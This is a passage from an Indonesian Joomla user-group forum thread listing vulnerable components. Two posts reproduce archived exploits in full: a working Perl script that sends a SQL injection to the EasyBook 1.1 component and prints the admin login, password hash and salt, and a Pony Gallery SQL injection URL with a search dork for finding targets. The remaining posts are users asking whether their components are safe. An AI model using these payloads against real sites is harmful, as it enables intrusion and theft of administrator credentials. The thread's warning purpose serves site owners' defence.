Joomla Indonesia

Login or Sign Up
Sign In or Register
Avatar
Not Registered Yet?

Join Now! It's FREE. Get full access and benefit from this site

Reset My password - Remind Me My username

Username
Password
Remember me

TOPIC: PERHATIAN!! Komponen-komponen yang beresiko/belum

Re:PERHATIAN!! Komponen-komponen yang beresiko/bel 13 years 5 months ago #31628

  • dennie
  • dennie's Avatar
  • OFFLINE
  • Ksatria joomla
  • Posts: 383
  • Karma: -2
Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit
#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example: #
# Host: xxx.lu #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gbid= --+-\n";
print "-+-- Homepage: antichat.ru --+-\n";
print "-+-- Dork: com_easybook --+-\n\n";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket "POST /index.php HTTP/1.0\n".
"Host: www.$host\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: 214\n\n".
"option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
while(<$socket>)
{
$s = <$socket>;
if($s=~/:::(.+):::/){
$lhs = $1;
($l,$h,$s)=split(':',$lhs);
print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
close $socket;
exit; }
}
die ("Exploit failed!");

# milw0rm.com [2008-06-04]
The administrator has disabled public write access.

Re:PERHATIAN!! Komponen-komponen yang beresiko/bel 13 years 5 months ago #31732

  • kepedihan
  • kepedihan's Avatar
  • OFFLINE
  • Pejuang Joomla
  • Posts: 106
  • Karma: 1
wahh.. easybook ???

saya pake easygb... aman ga yah ??? :unsure:
The administrator has disabled public write access.

Re:PERHATIAN!! Komponen-komponen yang beresiko/bel 13 years 5 months ago #31733

  • kepedihan
  • kepedihan's Avatar
  • OFFLINE
  • Pejuang Joomla
  • Posts: 106
  • Karma: 1
easybook trakhir... Version: 2.0 (Updated 3 days ago)
The administrator has disabled public write access.

Re:Joomla v1.0.13 CSRF Vulnerability 13 years 5 months ago #32897

  • guslove
  • guslove's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 1
  • Karma: 0
*******************************************************************************
# Title : Joomla Component Pony Gallery <= 1.5 Remote Blind SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : joomlander.net
# $$ : Free
# Dork : inurl:"index.php?option=com_ponygallery"
# DorkEx : www.google.com.tr/search?hl=tr&q=inurl%3...&btnG=Ara&meta=lr%3D

# Info : \*Herhangi bir resim kategorisine girin,onunda alt kategorisi varsa girin
her sitede uygulanamýyor acik.Exploit yazmasý zor geldi ne yln söliyim
gecenin 2sinde: )

# Msg : Kandiliniz Mubarek Olsun.....

*******************************************************************************

SQL]

http://[target]/[path]//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Inject]

Example:

//index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*

/SQL

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-07-19]



itu maksudnya apa ya????terus ngaruh ke webnya sendiri apa??dan apa yng bisa dilakukan ama si penjebol ketika dia dah berhasil ngejebol web itu???thx.....

maap ya terlalu banyak nanya....masih newbie ni......hehehe
The administrator has disabled public write access.

Re:PERHATIAN!! Komponen-komponen yang beresiko/belum 13 years 1 month ago #52535

  • adikhresna
  • adikhresna's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 6
  • Karma: 0
Informasi yang sangat berharga. Aku mo nanya, pluggin jSecure Authentication amankah bagi situs kita? Coz ada beberapa pernyataan yang membingungkan aku. Pliss informasinya ya... Thank
The administrator has disabled public write access.

Re:List komponen beresiko - UPDATE 12 years 10 months ago #70360

  • aldyn
  • aldyn's Avatar
  • OFFLINE
  • Warga Joomla
  • Posts: 11
  • Karma: 0
wah bagus tutorial nya,
untuk saat ini apakah semua komponent expose flash gallery all type mengandung BUGs? lalu apa kira2 komponent yang tidak mengandung BUGS,
terimakasih
The administrator has disabled public write access.
Moderators: alvino, rajasetan, willkhu, KhanTry
Time to create page: 0.150 seconds

Diskusi Terakhir

  • No posts to display.

Joomla User Group Indonesia

Joomla User Group indonesia

Id-joomla.com adalah situs resmi Joomla User Group (JUG) Indonesia dan Joomla Translation Team

 
Download Terjemahan Joomla terakreditasi dari JoomlaCode dan laporkan bugs, ide dan saran nya di Sub Forum Hanacaraka

Socials

twitter id joomlafb idjoomla